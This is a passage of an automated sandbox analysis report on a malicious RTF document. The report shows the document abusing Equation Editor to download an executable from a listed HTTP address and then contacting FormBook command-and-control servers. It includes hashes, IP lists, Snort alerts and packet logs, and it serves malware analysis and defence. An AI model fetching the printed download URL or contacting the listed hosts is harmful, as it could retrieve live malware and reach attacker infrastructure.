                                                                                                                                                      • 45.142.156.44
                                                                                                                                                      MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.142.156.44
                                                                                                                                                      shipping document008476_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.142.156.44
                                                                                                                                                      Swift_Payment_jpeg.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.142.156.44
                                                                                                                                                      IRS_Microsoft_Excel_Document_xls.jarGet hashmaliciousBrowse
                                                                                                                                                      • 45.142.156.44
                                                                                                                                                      uM0FDMSqE2.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.142.156.43
                                                                                                                                                      #U043e#U0444#U0435#U0440#U0442#U0430 #U0437#U0430 #U043f#U043e#U0440#U044a#U0447#U043a#U0430.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.142.156.48
                                                                                                                                                      HussanCrypted.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.142.156.48
                                                                                                                                                      Mediform S.A Order Specification Requirement.xls.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.142.156.48
                                                                                                                                                      Mediform Order Specification Requirement.xls.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.142.156.48

                                                                                                                                                      ASN

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      HENGTONG-IDC-LLCUSeQLPRPErea.exeGet hashmaliciousBrowse
                                                                                                                                                      • 104.128.125.95
                                                                                                                                                      FTT103634332.exeGet hashmaliciousBrowse
                                                                                                                                                      • 104.128.126.123
                                                                                                                                                      ARBmDNJS7m.exeGet hashmaliciousBrowse
                                                                                                                                                      • 104.128.125.95
                                                                                                                                                      Purchase Order 2021 - 00041.exeGet hashmaliciousBrowse
                                                                                                                                                      • 104.232.96.254
                                                                                                                                                      New order.exeGet hashmaliciousBrowse
                                                                                                                                                      • 104.232.96.254
                                                                                                                                                      SWIFT_png.exeGet hashmaliciousBrowse
                                                                                                                                                      • 220.158.226.143
                                                                                                                                                      RPI_Scanned_30957.docGet hashmaliciousBrowse
                                                                                                                                                      • 202.14.6.113
                                                                                                                                                      Ordine -159-pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.202.50.110
                                                                                                                                                      FB_1401_4_5,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 27.0.156.189
                                                                                                                                                      dwg.exeGet hashmaliciousBrowse
                                                                                                                                                      • 146.148.189.216
                                                                                                                                                      PO_210222.exeGet hashmaliciousBrowse
                                                                                                                                                      • 104.232.96.251
                                                                                                                                                      IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                                                                                                                      • 202.14.6.113
                                                                                                                                                      zMJhFzFNAz.exeGet hashmaliciousBrowse
                                                                                                                                                      • 203.88.111.71
                                                                                                                                                      Payment_Advice.exeGet hashmaliciousBrowse
                                                                                                                                                      • 107.178.135.177
                                                                                                                                                      Order 8953-PDF.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.202.50.110
                                                                                                                                                      IN 20201125 PL.xlsxGet hashmaliciousBrowse
                                                                                                                                                      • 45.41.85.153
                                                                                                                                                      Order Catalogue.xlsxGet hashmaliciousBrowse
                                                                                                                                                      • 146.148.242.120
                                                                                                                                                      documents_0084568546754.exeGet hashmaliciousBrowse
                                                                                                                                                      • 104.232.66.117
                                                                                                                                                      EK6BR1KS50.exeGet hashmaliciousBrowse
                                                                                                                                                      • 146.148.193.212
                                                                                                                                                      SWIFT Payment DOOEL EUR 74,246.41 20210101950848.exeGet hashmaliciousBrowse
                                                                                                                                                      • 107.178.135.177
                                                                                                                                                      AS-COLOCROSSINGUSNew Order for April#89032.xlsxGet hashmaliciousBrowse
                                                                                                                                                      • 198.23.174.104
                                                                                                                                                      PO PR 111500976.xlsxGet hashmaliciousBrowse
                                                                                                                                                      • 198.23.213.61
                                                                                                                                                      Revised Proforma.xlsxGet hashmaliciousBrowse
                                                                                                                                                      • 198.23.207.115
                                                                                                                                                      7yTix20XaT.rtfGet hashmaliciousBrowse
                                                                                                                                                      • 198.23.251.121
                                                                                                                                                      Inquiry.docxGet hashmaliciousBrowse
                                                                                                                                                      • 198.23.251.121
                                                                                                                                                      order1562.docxGet hashmaliciousBrowse
                                                                                                                                                      • 198.23.251.121
                                                                                                                                                      order1562.docxGet hashmaliciousBrowse
                                                                                                                                                      • 198.23.251.121
                                                                                                                                                      lF5VYmf6Tm.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.3.26.107
                                                                                                                                                      P.O_RFQ0098765434.xlsxGet hashmaliciousBrowse
                                                                                                                                                      • 198.46.132.132
                                                                                                                                                      Payment Proof.xlsxGet hashmaliciousBrowse
                                                                                                                                                      • 198.23.174.104
                                                                                                                                                      0f0mccRNrP.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.3.26.107
                                                                                                                                                      R6G6EFOeOE.rtfGet hashmaliciousBrowse
                                                                                                                                                      • 198.23.251.121
                                                                                                                                                      NEW ORDER PO.xlsxGet hashmaliciousBrowse
                                                                                                                                                      • 198.23.213.57
                                                                                                                                                      uIIHdM0MHt.rtfGet hashmaliciousBrowse
                                                                                                                                                      • 198.23.174.104
                                                                                                                                                      New purchase Order_Invoice payment info and shipping documents.docxGet hashmaliciousBrowse
                                                                                                                                                      • 198.23.251.121
                                                                                                                                                      SecuriteInfo.com.Packed-GDKD3066D931944.20107.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.3.26.107
                                                                                                                                                      SecuriteInfo.com.W32.AIDetect.malware1.1169.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.3.26.107
                                                                                                                                                      4i1GUIgglX.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.210.198.12
                                                                                                                                                      ACCOUNT SETTLED 32535365460.docxGet hashmaliciousBrowse
                                                                                                                                                      • 107.173.219.80
                                                                                                                                                      ACCOUNT SETTLED 32535365460.docxGet hashmaliciousBrowse
                                                                                                                                                      • 107.173.219.80
                                                                                                                                                      CNSERVERSUSNEW ORDER - BLL04658464.exeGet hashmaliciousBrowse
                                                                                                                                                      • 154.198.253.11
                                                                                                                                                      New Order.exeGet hashmaliciousBrowse
                                                                                                                                                      • 23.225.41.18
                                                                                                                                                      BL836477488575.exeGet hashmaliciousBrowse
                                                                                                                                                      • 172.247.179.61
                                                                                                                                                      B of L - way bill return.exeGet hashmaliciousBrowse
                                                                                                                                                      • 154.198.253.11
                                                                                                                                                      SwiftMT103_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.142.156.44
                                                                                                                                                      Request an Estimate_2021_04_01.exeGet hashmaliciousBrowse
                                                                                                                                                      • 154.198.196.146
                                                                                                                                                      xpy9BhQR3t.xlsxGet hashmaliciousBrowse
                                                                                                                                                      • 192.161.85.138
                                                                                                                                                      Scan-45679.exeGet hashmaliciousBrowse
                                                                                                                                                      • 23.225.141.130
                                                                                                                                                      BIOTECHPO960488580.exeGet hashmaliciousBrowse
                                                                                                                                                      • 172.247.179.61
                                                                                                                                                      Y79FTQtEqG.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.142.156.44
                                                                                                                                                      IMG001.exeGet hashmaliciousBrowse
                                                                                                                                                      • 23.225.141.130
                                                                                                                                                      Po # 6-10331.exeGet hashmaliciousBrowse
                                                                                                                                                      • 154.88.22.37
                                                                                                                                                      MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.142.156.44
                                                                                                                                                      Invoice #0023228 PDF.exeGet hashmaliciousBrowse
                                                                                                                                                      • 154.91.159.195
                                                                                                                                                      shipping document008476_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.142.156.44
                                                                                                                                                      Swift File_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 154.91.162.80
                                                                                                                                                      9VZe9OnL4V.exeGet hashmaliciousBrowse
                                                                                                                                                      • 172.247.179.61
                                                                                                                                                      lpdKSOB78u.exeGet hashmaliciousBrowse
                                                                                                                                                      • 23.224.206.45
                                                                                                                                                      PO_210223.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.66.59.142
                                                                                                                                                      DHL Document. PDF.exeGet hashmaliciousBrowse
                                                                                                                                                      • 154.86.13.178

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:downloaded
                                                                                                                                                      Size (bytes):387072
                                                                                                                                                      Entropy (8bit):6.9572597315329805
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:1wpTcyLItYxn3QDQN/rismCZyxB7HZ7g+xsoyEnGYgGI:1wpTd063QDQNSCZQB757txnG5l
                                                                                                                                                      MD5:29E8627D7B80C21FC98C82314F3DF5E2
                                                                                                                                                      SHA1:22817310A3108CED7EC26488E1E2D3D2F8C32018
                                                                                                                                                      SHA-256:98BF20A283219C4CC786234B7D389766FDDBE3B095D13C9109F5406128E83103
                                                                                                                                                      SHA-512:67DA772472FEA7587503C674CC7695D24D6A9B777FD3FB41090058730F65BDF55C7F5CF619EF8A6C2EBB0F03A5FF4DDD81A5846A40D307C711D9B71F72F20525
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                      Reputation:low
                                                                                                                                                      IE Cache URL:http://23.95.122.24/zyo/vbc.exe
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L......^............................A............@................................6...................................g.......<.... ...,...................P......................................X...@...........................................text...c........................... ..`.data..............................@....fipuh..............................@....wuta...y...........................@....new.....I......J..................@..@.rsrc....,... ......................@..@.reloc.......P.......L..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{08186652-BACB-4000-A55F-0BCBA7498F21}.tmp
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):16896
                                                                                                                                                      Entropy (8bit):3.637679925139952
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:3rOmx7l0ugn8SIWlnrAc+zxPKbJB9C54wCpj2LxwMhVEwvk4P7:3rOmx7Z5Un0c+NKpq1Uj5MDE6P7
                                                                                                                                                      MD5:0D7AA095A33BF035BB24251F43CF09B7
                                                                                                                                                      SHA1:C1B6823BFAA14AFF5DEB1376DCC5BCDA006B7709
                                                                                                                                                      SHA-256:B0E095778B4D43E99ABF372ED444644AB846E6D6534B49FAFCC3D3EAAA515D36
                                                                                                                                                      SHA-512:926243D893DC5F5B8812898CC6D0304A0C979B6821E8846B23BE836E0490CFFEFDD707C65E84DA5151EE8A1D163D12A97EEBD9D69CE0E0B89723D7289CBE1AFA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: &.?.^.:.4.9.9.?.9.%...7.4.&...0.~...;.@.?.!...?.>...~.'.6.:.#..._.<...(.8.).-.?.*./.:.].@.6.!.4.'.`.`.9...(.$.4.|.'.%.;.!.!.6.|.5.?.9...<.@.:.;.+.[.^.~.#.%.'.|.^.?.....].5.=.%.7.7.^.:._.<.3./.5.?.>.~.:.<./.8.2.;.>...?.>.?.5.<.?.`.`._.|.~...>.>.?.@.2.'._.%.1.:.?.3.$.?.#.$.7.4.#.+.8.?.@.?.7.!.3.?.;.?.4.?.|.,.,.?.;././.).#.%.&.....|.%.?.0.2.>.9.>.|..._.4.*.,./.&.].9.?.&.1.-.!.....|.0.&...@.?...8.8.?.%.%.;.;.(.3.`.8.?.[.*...+.*.^.4.&.2.9.|.%.5.*.|.?.1.|.%.=.1.].^.+.).(.[.,.-...?.0.^.@.).#.:.*.5.?.^.'._.?.8.[.9.?...?.+.+.-.4.!._.9.,...%.....3.;.~.?.&.$.#.;.%.=.6.+.5.3.~.<...3.0.|.4.|.@.7.'./.=.:.-.4.;.>.`.'.:.,.%.`.0.[.?.`.1.?.-.?.?.?.+.=.:.[.?.*.?.+.6.'.?.'.<.|.1.?.:.4.&.;.+.>...^.).|.|.%.5.8.=.|.)...4.<...8.4.<./.'.%._.9.3.,.@.[.;.?.7.0.[.?.5.%...;.!.[...?.:.2.~.-.6.-.%.$.?._.?.6.4.[.?.=.7./.?.?.?.<.9...'.2.|...3.?.[.?.2.?.;.!.7.5...*._.?.7.?.3.,.`.'.8.-.6.?.?...6...)...).'.?.1.<.=.....].!.%.9.8.-.1.?.$.7.0.%.?.5.?.|...6.|.$.=.!.=.5.!.1.4.$.@.'...%.>.].[.?.1.6.3.?.).5.+...5.6.[.=.%.4.7.9.
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{555C4A64-8E09-401E-A760-1A1C7B299BE3}.tmp
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1024
                                                                                                                                                      Entropy (8bit):0.05390218305374581
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\dot.LNK
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed Aug 26 14:08:17 2020, atime=Thu Apr 8 19:08:35 2021, length=12899, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1946
                                                                                                                                                      Entropy (8bit):4.492176824444847
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:8e6/XTm6GreVbsYeHDv3qSndM7dD2e6/XTm6GreVbsYeHDv3qSndM7dV:81/XTFGq9NZWQh21/XTFGq9NZWQ/
                                                                                                                                                      MD5:579CAEE57451C12C1DE3B6B2B4EAE5D7
                                                                                                                                                      SHA1:BF656A7E33237BEFE4112DF98153BD763C762535
                                                                                                                                                      SHA-256:81B2D9CD1AF7A1DD11C9721D01A1ED866CA661CEB3D6D66FFFC7EE5C67BC072B
                                                                                                                                                      SHA-512:5DADEB7516C676D8F9D98BF073F73BABE8C1BE18A1DB8E9078CB73CB878EC23BD4DBBA32ED530E218FEA094954A9421A8ED13727C4F93ED62274A92F3D266CB8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F.... ...T.S..{..T.S..{.......,..c2...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....R.2.c2...R.. .dot.dot.<.......Q.y.Q.y*...8.....................d.o.t...d.o.t.......q...............-...8...[............?J......C:\Users\..#...................\\320946\Users.user\Desktop\dot.dot.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.t...d.o.t.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......320946..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L..................F.... ..
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):47
                                                                                                                                                      Entropy (8bit):3.6274074179507254
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:bLKtp2Z82mALKtp2v:Qp88sEpI
                                                                                                                                                      MD5:34FC18ECF62CC5AECC4726F9FE45683D
                                                                                                                                                      SHA1:88081A58059D6CC1AF814F573CAB2F1B464AC972
                                                                                                                                                      SHA-256:25BC5FF0110BC4AAF0DABDCFACBD5935B62DEE77CD35131288CF3FD5D0218BE7
                                                                                                                                                      SHA-512:4E5385A30EC4B41FFE7BF0507513CCECF45E52D6CB24CFF3166C9EF35C9070C87C0F39041D23EA0BA454E7C6869958843C3E0FC82257824A0E46CE7F1EC035F7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: [dot]..dot.LNK=0..dot.LNK=0..[dot]..dot.LNK=0..
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):162
                                                                                                                                                      Entropy (8bit):2.431160061181642
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                                                                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                                                                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                                                                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                                                                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                                                                                                      C:\Users\user\Desktop\~$dot.dot
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):162
                                                                                                                                                      Entropy (8bit):2.431160061181642
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                                                                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                                                                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                                                                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                                                                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                                                                                                      C:\Users\Public\vbc.exe
                                                                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):387072
                                                                                                                                                      Entropy (8bit):6.9572597315329805
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:1wpTcyLItYxn3QDQN/rismCZyxB7HZ7g+xsoyEnGYgGI:1wpTd063QDQNSCZQB757txnG5l
                                                                                                                                                      MD5:29E8627D7B80C21FC98C82314F3DF5E2
                                                                                                                                                      SHA1:22817310A3108CED7EC26488E1E2D3D2F8C32018
                                                                                                                                                      SHA-256:98BF20A283219C4CC786234B7D389766FDDBE3B095D13C9109F5406128E83103
                                                                                                                                                      SHA-512:67DA772472FEA7587503C674CC7695D24D6A9B777FD3FB41090058730F65BDF55C7F5CF619EF8A6C2EBB0F03A5FF4DDD81A5846A40D307C711D9B71F72F20525
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L......^............................A............@................................6...................................g.......<.... ...,...................P......................................X...@...........................................text...c........................... ..`.data..............................@....fipuh..............................@....wuta...y...........................@....new.....I......J..................@..@.rsrc....,... ......................@..@.reloc.......P.......L..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Rich Text Format data, unknown version
                                                                                                                                                      Entropy (8bit):5.628188977802884
                                                                                                                                                      TrID:
                                                                                                                                                      • Rich Text Format (5005/1) 55.56%
                                                                                                                                                      • Rich Text Format (4004/1) 44.44%
                                                                                                                                                      File name:dot.dot
                                                                                                                                                      File size:12899
                                                                                                                                                      MD5:40f03856876fda8b3bda880d1d5a4636
                                                                                                                                                      SHA1:d252c054154c5524dfbf3f3238b32f711290fd36
                                                                                                                                                      SHA256:a4358b898c41852211ee727e4b8c0d05301bf4c6a90a4780c5a6f8b1b1cf5c81
                                                                                                                                                      SHA512:559a93f09a07a3aa13ffce038ef2d47a1b73ef6301fd2799a9b3cae99b3e7b652e65951a318cbe7bc31ae25ffeb05c644b08f306553ec9c70b4e60794e1e6687
                                                                                                                                                      SSDEEP:384:CrbzX8txvSYHKdnddR6DJlNmBjL0ztbQ3om:uH8bKdlkJlNmBjatO
                                                                                                                                                      File Content Preview:{\rtf3157&?^:499?9%.74&.0~.;@?!.?>.~'6:#._<.(8)-?*/:]@6!4'``9.($4|'%;!!6|5?9.<@:;+[^~#%'|^?..]5=%77^:_<3/5?>~:</82;>.?>?5<?``_|~.>>?@2'_%1:?3$?#$74#+8?@?7!3?;?4?|,,?;//)#%&..|%?02>9>|._4*,/&]9?&1-!..|0&.@?.88?%%;;(3`8?[*.+*^4&29|%5*|?1|%=1]^+)([,-.?0^@)#:

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:ecaea28aa4dcdc80

                                                                                                                                                      Static RTF Info

                                                                                                                                                      Objects

                                                                                                                                                      IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                                                                                      000001E9Bhno

                                                                                                                                                      Network Behavior

                                                                                                                                                      Snort IDS Alerts

                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                      04/08/21-13:10:40.826650ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                                                                                                                                      04/08/21-13:10:49.795681ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                                                                                                                                      04/08/21-13:10:50.936537ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                                                                                                                                      04/08/21-13:10:56.630959TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.2245.142.156.44
                                                                                                                                                      04/08/21-13:10:56.630959TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.2245.142.156.44
                                                                                                                                                      04/08/21-13:10:56.630959TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.2245.142.156.44

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Apr 8, 2021 13:09:08.437887907 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.555124998 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.555411100 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.556489944 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.675015926 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.675043106 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.675064087 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.675085068 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.675189972 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.678863049 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.792984962 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.793014050 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.793030024 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.793050051 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.793070078 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.793088913 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.793195963 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.794034004 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.795933008 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.795958996 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.796006918 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.796025038 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.912266016 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.912331104 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.912384033 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.912440062 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.912497044 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.912533998 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.912554026 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.912555933 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.912617922 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.912623882 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.912676096 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.912694931 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.912731886 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.912746906 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.912791014 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.912810087 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.912847996 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.912848949 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.912908077 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.912924051 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.912971973 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.913063049 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.913116932 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.913146019 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.913172960 CEST804916723.95.122.24192.168.2.22
                                                                                                                                                      Apr 8, 2021 13:09:08.913177967 CEST4916780192.168.2.2223.95.122.24
                                                                                                                                                      Apr 8, 2021 13:09:08.913233042 CEST804916723.95.122.24192.168.2.22
